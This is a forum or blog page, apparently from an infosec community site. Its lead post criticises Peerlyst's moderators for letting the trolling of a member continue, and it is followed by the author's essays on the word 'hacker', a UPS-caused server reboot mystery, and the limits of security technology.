Skip to content

How to destroy a community before it's even built

Blog
  • There’s a lot you can learn about a person just by the way they present themselves online - whether that is in a positive or negative light is really up to the individual posting the content. Several of my followers have questioned why I choose to part company with Peerlyst, and here’s why. Firstly, let’s understand the word “community”. Taken literally, it’s something like the below

    “The condition of sharing or having certain attitudes and interests in common.”

    Anyone calling themselves a community should abide by this basic description at all times. Especially the part “having certain attitudes”. It’s this very part of the description that is capable of destroying a community much faster than it takes to create one in the first place. It was always my dream and wish to give something back to the industry that adopted me at the age of 16 as a school leaver, and I promised myself that once I reached a plateau in my career, I would start giving something back in order to help others.

    This initial drive began in 2016 when I started writing articles for Peerlyst. The very first article I donated to the community here detailed the most common types of compromise, and what to look out for. Fairly soon, I was contacted and asked if I’d consider making this a featured resource that their community could use as a learning tool. Happily, I agreed, and began donating regular articles from my own blog for the benefit of their community. As a side point, there are several authors who write similar content for others, but it’s typically for a fee, or a mention in a larger community in order to promote that individual. This isn’t how I work. I’ve never chased glory - I get my satisfaction from those who read my articles, and engage in active discussion relating to the content.

    I always expected questions and dialogue arising from my articles. In most cases, the exchange of opinions, questions, and content in general made for a pleasant experience. Now, not every piece of creative writing inspires everyone, and I completely understand that. However, opinion can easily be divided when a specific response is used, and counter effective if the response hasn’t been well thought out before clicking that submit button. Written content often suffers from the same central ailment in the fact that it rarely conveys tone or emotion. When you read something someone else has written, it’s impossible to gauge body language or tone of voice. For this reason, diplomacy and a careful selection of words is often a good idea (also known as “think before you post”), as is reading your input before submitting it. Often, the first response to something isn’t always the best one, and you’ll find yourself effectively sanitising content before you submit after renewing it.

    However, the story (unfortunately) doesn’t end here. I was not on the receiving end of the diatribe about be unleashed, but watched (with a mixture of disgust and disbelief) as this whole scenario unfolded. The focal point of discussion was from this post

    Some of the comments left for the author of this post were in my view nothing short of disgusting to say the least. Here’s the opening comment

    Those are great academic credentials. Let’s talk about “in the trenches” experience. Were you ever an engineer or specialist hunting threats and vulnerabilities? Run a NESSUS scan? Perform threat mitigation? Get called at 3AM because your network was hacked? What I am seeing is a professional test taker and academic. Perhaps with a photographic memory and tons of charisma? Getting a PhD at an early age and knowing 5 different languages leads me to believe the previous sentence.

    Where is the actual, bonafide experience?As for your “acting chief information security officer for regulated businesses”, again, where is the actual experience? Anyone can be a CISO including a person with a Music background. Just saying.

    There was a comment from the original author of this post, but it has since been removed. It was essentially threatening the author of the above comment with a lawsuit for defamation of character. Unsurprisingly, the response below was then posted

    Feel free. I am well known on here. And your lawyer can contact me at the provided address. If you were truly serious, you would offer the proof I am requesting. I will gladly acknowledge your certification and knowledge when the proof is provided. But you have not done so and that is an indication of your true meaning. I doubt your certification as a CISSP and you have done nothing to prove me wrong. The truth is your only defense.

    I don’t claim to be an airplane pilot. I could not tell you how to land a 737. Why should you be any exemption to that? You claim to be a cybersecurity expert with a CISSP requiring 4 years of actual experience. Where is it? If you will acknowledge that experience, I will not only accept it, I will endorse you.

    Have you “attorney” bring suit against me here in the US (I’ll never travel to Singapore so that doesn’t matter). Have him/her contact me at my stated email address. I will gladly share my physical mailing address for service of process. I’ll encourage service! Let’s go to court. Perhaps I know the laws better than you in the US not to mention cybersecurity.

    As for Peerlyst, maybe they will see it fit to remove an individual who is a poser. A fake. A charlatan through her own lack of admissions. If they ask me to be silent on this, I will honour their request. It is their site after all. Guess we will need to wait and see.

    Is this really necessary ? Since when did we consider it appropriate to behave like Neanderthals by publicly humiliating someone else, then dragging their reputation through the mud ? This is when a so called community deteriorates to a battlefield, and if the moderators do not make an effort to ring fence “debates” like this, they quickly spiral out of control and dramatically damage what the community set out the build the in the first place. The best way to extinguish this particular situation is to disable the comments for that post. As a moderator, this is one the immediate mechanisms to prevent brand damage. However, this course of action was not taken, and incredibly, the moderators chose to actually engage in the debate. This was not a wise choice, as the participants then started to respond to the interjection and went off track in the process. Mediation is a powerful tool when running a community, but it’s effectiveness is severely impacted when you decide to air dirty laundry in public.  Why on earth would you want to engage in a debate with someone when they are clearly trolling someone else ? You’re supposed to actually prevent that from happening in my view. And this is the real reason why I will never write for Peerlyst again. They have knowingly damaged their own community - effectively allowing someone else to poison it’s integrity and standing as a reliable information source. I know of two others who have contacted me since my LinkedIn post detailing that I no longer write for Peerlyst, and expressed the same reasons as mine stated above.

    And so, on the 15th of November, I invoked my version of “Article 50”, and decide to leave the Peerlyst community by deactivating my account, and effectively, exercising my Right To Be Forgotten. For those who don’t fully understand the meaning of this, here’s a snippet supplied by the ICO

    The right to erasure is also known as ‘the right to be forgotten’. The broad principle underpinning this right is to enable an individual to request the deletion or removal of personal data where there is no compelling reason for its continued processing.

    I was contacted by Peerlyst the following day asking why I had deleted my account. I’m not convinced it was the fact that they were genuinely sorry that they had lost a member - but where more concerned that the content I had contributed over time was also deleted as part of the account deactivation procedure. Here’s some of the comments I received

    “I’m sorry to hear that you decided to leave for this reason. I understand you have your own initiative, which I hope will work well for you. However, removing the content which serves 100,000 monthly readers and 500,000 unique readers is a pity for those who come to Peerlyst to learn”

    My response was that all content I had previously provided is posted on my own site. It’s actually my work, and Peerlyst are no longer permitted to use it. I was also asked if I would leave my account in place so that they could retain the content. This concerns me somewhat, as that would imply the content hasn’t actually been deleted, but “moved off the site to somewhere else”. I have asked for Peerlyst to confirm that the data has been removed - so far, there has not been any response. I guess they have until May 2018 to delete it from the GDPR standpoint in order be in full compliance.

    The other comment I received was

    “So sad to see you deactivated your account. You used to believe in the mission of sharing everything to help people improve!?”

    My response…

    “And I still do. Just not for Peerlyst”.

    The point I’ll make here is as follows. For a community to succeed it has to have a solid foundation, and a clearly defined policy. There isn’t much to the policies I put together, and they can be found here.

    https://sudonix.org/policies

    Based on what I saw on Peerlyst, I felt the need to update these accordingly. Take a look yourself. I personally want to mentor the next generation of InfoSec professionals, not get into a pathetic “s**t slinging” match that yields no real benefit whatsoever. I’ve also been contacted by one of the moderators - evidently, Peerlsyt’s CEO (at the time - they are now defunct) wanted to have a call with her to discuss this. Too little, too late, I’m afraid. The damage is done. I don’t want an apology as one isn’t needed. I don’t want a discussion as nothing will change. In reality, I refuse to associate my name or any of my content with a so-called community that is effectively endorsing  one of the worst online experiences we have to date - trolling.

  • phenomlabundefined phenomlab referenced this topic on
  • @phenomlab I am sorry to hear about your experience. I fully support your decision, and I believe it is waste of time to spend one more minute in those kinds of environments anyway. As you said, the attitudes of the moderators are very important. Even if you can bring a lot of talented people together, if you cannot maintain the atmosphere of the community, it will not lead anywhere good. moderators/admins are quite important, if they are not competent the community is doomed.

    I guess we can think of this as movie remakes that are much worse than the originals… Just because you have a great scenario and better actors, it does not mean the movie will be directed better. With worse directors/directing, you can end up having worse movies like Psycho, The Shining, and Mummy… The remakes are terrible for each one, Mummy remake even had Tom Cruise in it, but it is way worse than the original 😄 So, it is clear that the “director” (moderators) is quite a key.

  • I can appreciate how important your relationship with them meant to you, and how frustrating it would have been if they hadn’t seen all your efforts. In particular, you can discover similar folks in pubs where the world is like that. If you find time you can read " They have the right to believe what they want to believe "

  • @crazycells I guess the worst part for me was the trolling - made so much worse by the fact that the moderators allowed it to continue, insisting that the PeerLyst coming was seeing an example by allowing the community to “self moderate” - such a statement being completely ridiculous, and it wasn’t until someone else other than myself pointed out that all of this toxic activity could in fact be crawled by Google, that they decided to step in and start deleting posts.

    In fact, it reached a boiling point where the CEO herself had to step in and post an article stating their justification for “self moderation” which simply doesn’t work.

    The evidence here speaks for itself.


  • 0 Votes
    1 Posts
    191 Views

    1622032930658-hacked_listen-min.webp

    I’ve been a veteran of the infosec industry for several years, and during that time, I’ve been exposed to a wide range of technology and situations alike. Over this period, I’ve amassed a wealth of experience around information security, physical security, and systems. 18 years of that experience has been gained within the financial sector - the remaining spread across manufacturing, retail, and several other areas. I’ve always classed myself as a jack of all trades, and a master of none. The real reason for this is that I wanted to gain as much exposure to the world of technology without effectively “shoehorning” myself - pigeon holing my career and restricting my overall scope.

    I learned how to both hack and protect 8086 / Z80 systems back in 1984, and was using “POKE” well before Facebook coined the phrase and made it trendy (one of the actual commands I still remember to this day that rendered the CTRL, SHIFT, ESC break sequence useless was

    POKE &bdee, &c9

    I spent my youth dissecting systems and software alike, understanding how they worked, and more importantly, how easily they could be bypassed or modified.

    Was I a hacker in my youth ? If you understand the true meaning of the word, then yes - I most definitely was.

    If you think a hacker is a criminal, then absolutely not. I took my various skills I obtained over the years, honed them, and made them into a walking information source - a living, breathing technology encyclopedia that could be queried simply by asking a question (but not vulnerable to SQL injection).

    Over the years, I took an interest in all forms of technology, and was deeply immersed in the “virus era” of the 2000’s. I already understood how viruses worked (after dissecting hundreds of them in a home lab), and the level of damage that could be inflicted by one paved the way for a natural progression to early and somewhat infantile malware. In its earliest form, this malware was easily spotted and removed. Today’s campaigns see code that will self delete itself post successful execution, leaving little to no trace of its activity on a system. Once the APT (Advanced Persistent Threat) acronym became mainstream, the world and its brother realised they had a significant problem in their hands, and needed to respond accordingly. I’d realised early on that one of the best defences against the ever advancing malware was containment. If you “stem the flow”, you reduce the overall impact - essentially, restricting the malicious activity to a small subset rather than your entire estate.

    I began collaborating with various stakeholders in the organisations I worked for over the years, carefully explaining how modern threats worked, the level of damage they could inflict initially from an information and financial perspective, extending to reputation damage and a variety of others as campaigns increased in their complexity). I recall one incident during a tenure within the manufacturing industry where I provided a proof of concept. At the time, I was working as a pro bono consultant for a small company, and I don’t think they took me too seriously.

    Using an existing and shockingly vulnerable Windows 2003 server (it was still using the original settings in terms of configuration - they had no patching regime, meaning all systems were effectively vanilla) I exhibited how simple it would be to gain access first to this server, then steal the hash - effortlessly using that token to gain full access to other systems without even knowing the password (pass the hash). A very primitive exercise by today’s standards, but effective nonetheless. I explained every step of what I was doing along the way, and then explained how to mitigate this simple exploit - I even provided a step by step guide on how to reproduce the vulnerability, how to remediate it, and even provided my recommendations for the necessary steps to enhance security across their estate. Their response was, frankly, shocking. Not only did they attempt to refute my findings, but at the same time, dismissed it as trivial - effectively brushing it under the carpet so to speak. This wasn’t a high profile entity, but the firm in question was AIM listed, and by definition, were duty bound - they had a responsibility to shareholders and stakeholders to resolve this issue. Instead, they remained silent.

    Being Pro Bono meant that my role was an advisory one, and I wasn’t charging for my work. The firm had asked me to perform a security posture review, yet somehow, didn’t like the result when it was presented to them. I informed them that they were more than welcome to obtain another opinion, and should process my findings as they saw fit. I later found out through a mutual contact that my findings had been dismissed as "“unrealistic”, and another consultant had certified their infrastructure as “safe”. I almost choked on my coffee, but wrote this off as a bad experience. 2 months later, I got a call from the same mutual contact telling me that my findings were indeed correct. He had been contacted by the same firm asking him to provide consultancy for what on the face of it, looked like a compromised network.

    Then came the next line which I’ll never forget.

    “I don’t suppose you’d be interested in……”

    I politely refused, saying I was busy on another project. I actually wasn’t, but refused out of principle. And so, without further ado, here’s my synopsis

    “…if you choose not to listen to the advice a security expert gives you, then you are leaving yourself and your organisation unnecessarily vulnerable. Ignorance is not bliss when it comes to security…”

    Think about what you’ve read for a moment, and be honest with me - say so if you think this statement is harsh given the previous content.

    The point I am trying to make here is that despite sustained effort, valiant attempts to raise awareness, and constantly telling people they have gaping holes in systems for them to ignore the advice (and the fix I’ve handed to them on a plate) is extremely frustrating. Those in the InfoSec community are duty bound to responsibly disclose, inform, educate, raise awareness, and help protect, but that doesn’t extend to wiping people’s noses and telling them it wasn’t their fault that they failed to follow simple advice that probably could have prevented their inevitable breach. My response here is that if you bury your head in the sand, you won’t see the guy running up behind you intent on kicking you up the ass.

    Security situations can easily be avoided if people are prepared to actually listen and heed advice. I’m willing to help anyone, but they in return have to be equally willing to listen, understand, and react.

  • 0 Votes
    1 Posts
    205 Views

    1631808994808-scamming.jpg.webp

    One of many issues with working in the Infosec community is an inevitable backlash you’ll come across almost on a daily basis. In this industry, and probably hundreds of others like it are those who have an opinion. There’s absolutely nothing wrong with that, and it’s something I always actively encourage. However, there’s a fine line between what is considered to be constructive opinion and what comes across as a bigoted approach. What I’m alluding to here is the usage of the word “hacker” and it’s context. I’ve written about this particular topic before which, so it seems, appears to have pressed a few buttons that “shouldn’t be pressed”.
    alt text

    But why is this ?

    The purpose of this article is definition. It really isn’t designed to “take sides” or cast aspersions over the correct usage of the term, or which scenarios and paradigms it is used correctly or incorrectly against. For the most part, the term “hacker” seems to be seen as positive in the Infosec community, and based on this, the general consensus is that there should be greater awareness of the differences between hackers and threat actors, for example. The issue here is that not everyone outside of this arena is inclined to agree. You could argue that the root of this issue is mainly attributed to the media and how they portray “hackers” as individuals who pursue nefarious activity and use their skills to commit crime and theft on a grand scale by gaining illegal access to networks. On the one hand, the image of hoodies and faceless individuals has created a positive awareness and a sense of caution amongst the target groups – these being everyday users of civilian systems and corporate networks alike, and with the constant stream of awareness campaigns running on a daily basis, this paradigm serves only to perpetuate rather than diminish. On the other hand, if you research the definition of the term “hacker” you’ll find more than one returned.

    Is this a fair reflection of hackers ? To the untrained eye, picture number 2 probably creates the most excitement. Sure, picture 1 looks “cool”, but it’s not “threatening” as such, as this is clearly the image the media wants to display. Essentially, they have probably taken this stance to increase awareness of an anonymous and faceless threat. But, it ISN’T a fair portrayal.

    Current definitions of “the word”

    The word “hacker” has become synonymous with criminal activity to the point where it cannot be reversed. Certainly not overnight anyway. The media attention cannot be directly blamed either in my view as without these types of campaigns, the impact of such a threat wouldn’t be taken seriously if a picture of a guy in a suit (state sponsored) was used. The hoodie is representative of an unknown masked assailant and it’s creation is for awareness – to those who have no real understanding of what a hacker should look like – hence my original article. As I highlighted above, we live in a world where a picture speaks a thousand words.

    The word hacker is always going to be associated with nefarious activity and that’s never going to change, regardless of the amount of effort that would be needed to re-educate pretty much the entire planet. Ask anyone to define a hacker and you’ll get the same response. It’s almost like trying to distinguish the deference between a full blown criminal and a “lovable rogue” or the fact that hoodies aren’t trouble making adolescent thugs.

    Ultimately, it’s far too ingrained – much like the letters that flow through a stick of rock found on UK seaside resorts. It’s doesn’t matter how much you break off, the lettering exists throughout the entire stick regardless if you want that to happen or not. To make a real change, and most importantly, have media (and by definition, everyone else) realise they have made a fundamental misjudgement, we should look at realistic definitions.

    The most notable is the below, taken from Tech Target

    A hacker is an individual who uses computer, networking or other skills to overcome a technical problem. The term hacker may refer to anyone with technical skills, but it often refers to a person who uses his or her abilities to gain unauthorized access to systems or networks in order to commit crimes. A hacker may, for example, steal information to hurt people via identity theft, damage or bring down systems and, often, hold those systems hostage to collect ransom.

    The term hacker has historically been a divisive one, sometimes being used as a term of admiration for an individual who exhibits a high degree of skill, as well as creativity in his or her approach to technical problems. However, the term is more commonly applied to an individual who uses this skill for illegal or unethical purposes.

    One great example of this is that hackers are not “evil people” but are in fact industry professionals and experts who use their knowledge to raise awareness by conducting proof of concept exercises and providing education and awareness around the millions of threats that we are exposed to on an almost daily basis. So why does the word “hacker” strike fear into those unfamiliar with its true meaning ? The reasoning for this unnecessary phenomena isn’t actually the media alone (although they have contributed significantly to it’s popularity). It’s perception. You could argue that the media have made this perception worse, and to a degree, this would be true. However, they actually didn’t create the original alliance – the MIT claimed that trophy and gave the term the “meaning” it has to this day. Have a look at this

    MIT Article

    Given the origins of this date back to 1963, the media is not to blame for creating the seemingly incorrect original reference when it’s fairly obvious that they didn’t. The “newspaper” reflected in the link is a campus circulation and was never designed for public consumption as far as I can see. Here’s a quote from that article:

    “Many telephone services have been curtailed because of so-called hackers, according to Professor Carleton Tucker, administrator of the Institute telephone system.

    The students have accomplished such things as tying up all the tie-lines between Harvard and MIT, or making long-distance calls by charging them to a local radar installation. One method involved connecting the PDP-1 computer to the phone system to search the lines until a dial tone, indicating an outside line, was found.”

    The “so-called hackers” alignment here originally comes from “Phreaking” – a traditional method of establishing control over remote telephone systems allowing trunk calls, international dialling, premium rates, etc, all without the administrator’s knowledge. This “old school” method would certainly no longer work with modern phone systems, but is certainly “up there” with the established activity that draws a parallel with hacking.

    Whilst a significant portion of blogs, security forums, and even professional security platforms continue to use images of hoodies, faceless individuals, and the term “hacker” in the criminal sense, this is clearly a misconception – unfortunately one that connotation itself has allowed to set in stone like King Arthur’s Excalibur. In fairness, cyber criminals are mostly faceless individuals as nobody can actually see them commit a crime and only realise they are in fact normal people once they are discovered, arrested, and brought to trial for their activities. However, the term “hacker” is being misused on a grand scale – and has been since the 1980’s.

    An interesting observation here is that hoodies are intrinsically linked to threatening behaviour. A classic example of this is here. This really isn’t misrepresentation by the media in this case – it’s an unfortunate reality that is on the increase. Quite who exactly is responsible for putting a hacker in a hoodie is something of a discussion topic, but hackers were originally seen as “Cyberpunks” (think Matrix 1) until the media stepped in where they suddenly were seen as skateboarding kids in hoodies. And so, the image we know (and hackers loathe) was born. Perhaps one “logical” perspective for hoodies and hackers could be the anonymity the hoodie supposedly affords.

    The misconception of the true meaning of “hacker” has damaged the Infosec community extensively in terms of what should be a “no chalk” line between what is criminal, and what isn’t. However, it’s not all bad news. True meaning aside, the level of awareness around the nefarious activities of cyber criminals has certainly increased, but until we are able to establish a clear demarcation between ethics in terms of what is right and wrong, those hackers who provide services, education, and awareness will always be painted in a negative light, and by inference, be “tarred with the same brush”. Those who pride themselves on being hackers should continue to do so in my view – and they have my full support.

    It’s not their job solely to convince everyone else of their true intent, but ours as a community.

    Let’s start making that change.

  • 0 Votes
    1 Posts
    219 Views

    Once in every while, you encounter a repetitive issue that no matter what you try to do to resolve it, the problem manifests itself over and over again - sometimes, even on a daily basis. Much of how the issue is remediated really depends on the person assigned to the task.

    You might be puzzled at why I’d write about something like this, but it’s a situation I see constantly - one I like to refer to as “over thinker syndrome”. What do I mean by this ? Here’s the theory. Some people are very analytical when it comes to problem solving. Couple that with technical knowledge and you could land up with a situation where something relatively simple gets blown out of all proportion because the scenario played out in the mind is often much further from reality than you’d expect. And the technical reasoning is usually always to blame. Sometime around 2007, a colleague noticed that the Exchange Server (2003 wouldn’t you know) would suddenly reboot half way through a backup job. Rightly so, he wanted to investigate and asked me if this would be ok. Anyone with an ounce of experience knows that functional backups are critical in the event of a disaster - none more so than I - obviously, I have the go ahead. One bright spark in my team suggested a reboot of the server, which immediately prompted the response

    “…it’s rebooting itself every day, so how will that help ?”

    The investigation

    Joking aside, we’ve all heard the “have you rebooted” question touted at some point during helpdesk discussions, but this one was different. A system rebooting itself is usually symptomatic of an underlying issue somewhere, and my team member was ready for the task ahead. Stepping up to the plate, he asked if it was ok to install some monitoring software on the server. Usually, installing additional software components in a production server without testing first is a non-starter, but seeing as we needed to get this resolved as quickly as possible to reinstate the nightly backup (which incidentally hasn’t run successfully for 3 days by now), I provided approval to proceed without question. There’s a leap of faith at this point, as you could cause more problems than that you actually set out to resolve in the first place, but, as with anything related to information technology, someone’s you have to accept an element of risk. The software itself was actually for the RAID controller and motherboard  The assigned technician had already decided it was related to something along the lines of a faulty RAM module, or perhaps an issue with the controller itself. My thoughts leaned elsewhere already at this point - is the server reboots itself at exactly the same time every day then there is an established pattern which should be investigated first. It’s a logical approach, but it’s a common trait for technical support staff to sometimes think outside of the box - or in this case, outside of the building. Not wanting to push my opinion, or trample on anyone’s toes, I decided to remain quiet and see just how far this would go before intervention was required.

    In this case, not very far. The following morning after another unannounced nightly reboot, the error “the previous shutdown at [insert time and date here] was unexpected” showed up in the event log. No real surprises there, and once again, exactly the same time as the previous night. I asked my technician for an update, and he informed me that he believed that the memory was faulty and somehow causing the server to blue screen and reboot. That was actually a reasonable response and so I commended him on his research and findings, but also reminded him to perform a manual backup so that we at least had something to revert to in the event of a failure. Later that afternoon, the same tech approached me and said that he had ordered some replacement memory, and wanted to arrange downtime to fit it. Trying to keep a poker face and remain passive, I agreed and the memory was replaced the same evening around 10pm. At 2am the following morning, kaboom ! - the server rebooted itself again. Not wanting to admit defeat, our courageous tech suggested that the problem could be due to the system overheating. Another fair point, but not realistic as you’d see this in event log as a thermal shutdown. I willingly entertained this, and allowed investigations into the CPU temperature to begin - after another manual backup. Unsurprisingly, the temperature data returned no smoking gun, so that was abandoned. The next port of call was to reapply the service pack. Now, I’ll admit that this used to fix a multitude of issues under Windows NT Server (particularly Service Pack 4) but not under Windows 2003. I declined this for obvious reasons - if you reapply the service pack, you run the risk of overwriting key DLL files that could (and often will) render Exchange inoperable. Not being prepared to introduce an unprecedented risk into what was already becoming something of a showcase, I suggested that we look elsewhere.

    The exasperation

    The final (and honestly more realistic suggestion) was to enable verbose logging in Exchange. This is actually a good idea, but only if you suspect that the information store could be the issue. Given the evidence, I wasn’t convinced. If there was corruption in the store, or on any of the disks, this would show itself randomly through the day and wouldn’t wait until 2am in the morning. Not wanting to come across as condescending, I agreed, but at the same time, set a deadline to escalation. I wasn’t overly concerned about the backups as these were being completed manually each day whilst the investigations were taking place. Neither was I concerned at what could be seen at this point as wasting someone’s time when you think you may have the answer to what now seemed to be an impossible problem. This is where experience will eclipse any formal qualifications hands down. Those with university degrees may scoff at this, but those with substantially analytical thinking patterns seem to avoid logic like the plague and go off on a wild tangent looking for a dramatically technical explanation and solution to a problem when it’s much simpler than you’d expect. Hence the title of this article - Avoid the “bulldozer to find a china cup” scenario. After witnessing another pained expression on the face of my now exasperated and exhausted tech, I said “let’s get a coffee”. In agreement, he followed me to the kitchen and then asked me what I thought the problem could be. I said that if he wanted my advice, it would be to step back and look at this problem from a logical angle rather than technical. The confused look I received was priceless - the guy must have really though I’d lost the plot. After what seemed like an eternity (although in reality only a few seconds) he asked me what I meant by this. “Come with me”, I said. Finishing his coffee, he diligently followed me to the server room. Once inside, I asked him to show me the Exchange Server. Puzzled, he correctly pointed out the exact machine. I then asked him to trace the power cables and tell me where they went.

    As with most server rooms, locating and identifying cables can be a bit of a challenge after equipment has been added and removed, so this took a little longer than we expected. Eventually, the tech traced the cables back to

    …an old looking UPS that had a red light illuminated at the front like it had been a prop in a Terminator film.

    The realisation

    Suddenly, the real cause of this issue dawned on the tech like a morning sunrise over the Serengeti. The UPS that the Exchange Server was unexpectedly connected to had a faulty battery. The UPS was conducting a self test at 2am each morning, and because the bypass test failed owing to the burnt battery, the connected server lost power and started back up after the offending equipment left bypass mode and went online.

    Where is this going you might ask ?  Here’s the moral of this (particular, and many others like it) story

    Just because a problem involves technology, it doesn’t mean that the answer has to be a complex technical one Logic and common sense has a part to play in all of our lives. Sometimes, it makes more sense just to step back, take a breath, and see something for what it really is before deciding to commit It’s easy to allow technical expertise to cloud your judgement - don’t fall into the trap of using a sledgehammer to break an egg You cannot buy experience - it’s earned, gained, and leaves an indelible mark

    Let’s hear your views. Did you ever come across a situation where no matter what you tried, nothing worked ? Did the solution turn out to be much simpler than you’d have ever thought ?

  • 0 Votes
    1 Posts
    162 Views

    1631810017053-netsecurity.jpg.webp
    I read an article By Glenn S. Gerstell (Mr. Gerstell is the general counsel of the National Security Agency) with a great deal of interest. That same article is detailed below

    The National Security Operations Center occupies a large windowless room, bathed in blue light, on the third floor of the National Security Agency’s headquarters outside of Washington. For the past 46 years, around the clock without a single interruption, a team of senior military and intelligence officials has staffed this national security nerve center.

    The center’s senior operations officer is surrounded by glowing high-definition monitors showing information about things like Pentagon computer networks, military and civilian air traffic in the Middle East and video feeds from drones in Afghanistan. The officer is authorized to notify the president any time of the day or night of a critical threat.

    Just down a staircase outside the operations center is the Defense Special Missile and Aeronautics Center, which keeps track of missile and satellite launches by China, North Korea, Russia, Iran and other countries. If North Korea was ever to launch an intercontinental ballistic missile toward Los Angeles, those keeping watch might have half an hour or more between the time of detection to the time the missile would land at the target. At least in theory, that is enough time to alert the operations center two floors above and alert the military to shoot down the missile.

    But these early-warning centers have no ability to issue a warning to the president that would stop a cyberattack that takes down a regional or national power grid or to intercept a hypersonic cruise missile launched from Russia or China. The cyberattack can be detected only upon occurrence, and the hypersonic missile, only seconds or at best minutes before attack. And even if we could detect a missile flying at low altitudes at 20 times the speed of sound, we have no way of stopping it.

    Something I’ve been saying all along is that technology alone cannot stop cyber attacks. Often referred to as a “silver bullet”, or “blinky lights”, this provides the misconception that by purchasing that new, shiny device, you’re completely secure. Sorry folks, but this just isn’t true. In fact, cyber crime, and it’s associated plethora of hourly attacks is evolving at an alarming rate - in fact, much faster than you’d like to believe.

    You’d think that for all the huge technological advances we have made in this world, the almost daily plethora of corporate security breaches, high profile data loss, and individuals being scammed every day would have dropped down to nothing more than a trickle - even to the point where they became virtually non-existent. We are making huge progress with landings on Mars, autonomous space vehicles, artificial intelligence, big data, machine learning, and essentially reaching new heights on a daily basis thanks to some of the most creative minds in this technological sphere. But somehow, we have lost our way, stumbled and fallen - mostly on our own sword. But why ?

    Just like the Y2k Gold Rush in the late 90’s, information security has become the next big thing with companies ranging from a few employees as startups to enterprise organisations touting their services and platforms to be the best in class, and the next “must have” tool in the blue team’s already bulging arsenal of tools. Tools that on their own in fact have little effect unless they are combined with something else as equally as expensive to run. We’ve spent so much time focusing on efforts ranging from what SEIM solution we need to what will be labelled as the ultimate silver bullet capable of eliminating the threat of attack once and for all that in my opinion, we have lost sight of the original goal. With regulatory requirements and best practice pushing us towards products and services that either require additional staff to manage, or are incredibly expensive to deploy and ultimately run. Supposedly, in an effort to simplify the management, analysis, and processing of millions of logs per hour we’ve created even more platforms to ingest this data in order to make sense of it.

    In reality, all we have created is a shark infested pool where larger companies consume up and coming tech startups for breakfast to ensure that they do not pose a threat to their business model / gravy train, therefore enabling them to dominate the space even further with their newly enhanced reach.

    How did we get to this ? What happened to thought process and working together in order to combat the threat that increases on an hourly basis ? We seem to be so focused on making sure that we aren’t the next organisation to be breached that we have lost the art of communication and the full benefit of sharing information so that it assists others in their journey. We’ve become so obsessed with the daily onslaught of platforms that we no longer seem to have the time to even think, let alone take stock and regroup - not as an individual, but as a community.

    There are a number of ”communities” that offer “free” forums and products under the open source banner, but sadly, these seem to be turning into paid-for products at a rate of knots. I understand people need to live and make money, but if awareness was raised to the point where users wouldn’t click links in phishing emails, fall for the fake emergency wire transfer request from the CEO, or be suddenly tempted by the latest offer in terms of cheap technology then we might - just might - be able to make the world a better place. In order to make this work, we first need to remove the stigma that has become so ingrained by the media and set in stone like King Arthur’s Excalibur. Let’s first start with the hacker / criminal parallel. They aren’t the same thing folks.

    Nope. Not at all. Hackers are those people who find ingenious ways of getting into networks and infrastructure that you never even knew existed, trick you into parting with sensitive information (then inform you as to where you went wrong), and most importantly, educate you so that you and your network are far more secure against real attacks and real criminals. These people exist to increase your awareness, and by definition, security footprint - not use it against you in order to steal. Hackers do like to wear hoodies as they are comfortable, but you won’t find one using gloves, wearing a balaclava or sunglasses, and in some cases, they actually prefer desktops rather than laptops.

    The image being portrayed here is one perpetuated by the media, and it has certainly been effective - but not in a positive way. The word “hacker” is now synonymous with criminals, where it really shouldn’t be. One defines security, whereas the other sets out to break it. If we locked up all the hackers on this planet, we’d only have the blue team remaining. It’s the job of the red team (hackers) to see how strong your defences are. Hackers exist to educate, not infiltrate (at least, not without asking for permission first :))

    I personally have lost count of how many times I’ve sat in meetings where a sales pitch around a security platform is touted as a one stop shop or a Swiss army knife that can protect your entire network from a breach. Admittedly, there’s some great technology on the market that performs a variety of functions to protect your estate, but they all fail to take into consideration the weakest link in any chain - users. Irrespective of bleeding edge “combat platforms” (as I like to refer to them), criminals are becoming very adept in their approach, leveraging techniques such as social engineering. It should come as no surprise for you to learn that this type of attack can literally walk past your shiny new defence system as it relies on the one vulnerability you cannot predict - the human. Hence the term “hacking humans”.

    I’m of the firm opinion that if you want to outsmart a criminal, you have to think like one. Whilst newfangled platforms are created to assist in the fight against cyber crime, they are complex to configure, suffer from alerting bloat (far too many emails so you end up missing the one where your network is actually being compromised), or are simply overwhelming and difficult to understand. Here’s the thing. You don’t need (although they do help) expensive bleeding edge platforms with flashing lights to tell you where weak points lie within your network, but you do need to understand how a criminal can and will exploit these. A vulnerability cannot be leveraged if it no longer exists, or even better, never even existed to begin with.

    And so, on with the mission, and the real reason as to why I created this site. I’ve been working in information technology for 30 years, and have a very strong technical background in network design and information security.

    What I want to do is create a communication, information, and awareness sharing platform. I created the original concept of what I thought this new community should look like in my head, but its taken a while to finally develop, get people interested, and on board. To my mind, those from inside and outside of the information security arena will pool together, share knowledge, raise awareness, and probably the most important, harness this new found force and drive change forward.

    The breaches we are witnessing on a daily basis are not going to simply stop. They will increase dramatically in their frequency, and will get worse with each incident.

    Let’s stop the “hackers are criminals” myth, start using our own unique talents in this field, and make a community that

    is able to bring effective change treats everyone as equals The community once fully established could easily be the catalyst for change - both in perception, and inception.

    Why not wield the stick for a change instead of being beaten with it, and work as a global virtual team instead ?

    Will you join me ? In case I haven’t already mentioned it, this initiative has no cost - only gains. It is entirely free.

  • 0 Votes
    1 Posts
    186 Views

    When you look at your servers or surrounding networks, what exactly do you see ? A work of art, perhaps ? Sadly, this is anything but the picture painted for most networks when you begin to look under the hood. What I’m alluding to here is that beauty isn’t skin deep - in the sense that neat cabling resembling art from the Sistine Chapel, tidy racks, and huge comms rooms full of flashing lights looks appealing from the eye candy perspective and probably will impress clients, but in several cases, this is the ultimate wolf in sheep’s clothing. Sounds harsh ? Of course it does, but with good intentions and reasoning. There’s not a single person responsible for servers and networks on this planet who will willingly admit that whilst his or her network looks like a masterpiece to the untrained eye, it’s a complete disaster in terms of security underneath.

